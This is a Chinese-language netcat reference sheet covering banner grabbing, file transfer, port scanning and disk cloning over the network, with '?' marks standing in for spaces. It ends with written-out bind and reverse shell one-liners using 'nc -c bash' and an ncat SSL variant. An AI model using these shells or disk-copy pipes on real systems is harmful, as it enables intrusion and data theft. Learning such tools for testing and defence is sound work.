banner信息 或 與服務(wù)器指定端口通信

nc ?-nv ?ip ?port

-n ?numeric-only ip address ?(not dns)

-v ?verbose ?(use twice for more verbose)

例如： ?nc ? ? -nv ? ?202.116.2.224 ?80 ? ?也可以利用nc進(jìn)行 smtp（25） pop3（110） 連接

電子取證

nc -l -p port > sth.txt ? ? 等待連接端

ls -alh | nc -nv ip ?port ?-q 1 ?連接客戶端

-l ? listen mode ?作為服務(wù)端監(jiān)聽 等待連接

-p ?port (0~65535) 指定端口去監(jiān)聽連接

-q ?end of file stdio ?wait 1 second ?信息傳送完成時(shí)，1秒之后結(jié)束

文件傳輸

nc -l -p port > xxx ? # xxx代表接收的文件

nc -nv ip port < xxx -q 1 ?#xxx代表要發(fā)送的文件，傳遞結(jié)束1秒后，斷開連接

或者

nc -l -p port -q 1 < xxx ?#代表發(fā)送的文件

nc -nv ip port >xxx ?#代表接收的文件

-q ?參數(shù)永遠(yuǎn)在發(fā)送端 ?

傳輸目錄

tar ?-cvf - music/ | ?nc -l -p port -q 1

nc -nv ip port | tar -xvf -

加密傳文件

nc -l -p port | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > xxx

mcrypt --flush -Fbq -a rijndael-256 -m ecb < xxx | nc -nv ip port -q 1

nc端口掃描

nc ?-nvz ip port1-port2

nc -nvzu ip port1-port2

nc 遠(yuǎn)程克隆磁盤

nc -l -p port | dd of=/dev/sda

dd if=/dev/sda | nc -nv ip port -q 1

遠(yuǎn)程電子取證，可以將目標(biāo)服務(wù)器硬盤遠(yuǎn)程復(fù)制，或者內(nèi)存

遠(yuǎn)程控制

正向

nc ?-l -p port -c bash

nc ip port?

反向

nc -l -p port

nc ip port -c bash

注 windows用戶把bash改成cmd

nc缺乏加密和身份驗(yàn)證的功能

ncat包含于nmap工具包中

ncat -c bash --allow ip -nvl port --ssl

ncat -nv ip port --ssl

不同系統(tǒng)/平臺(tái)的nc參數(shù)功能不盡相同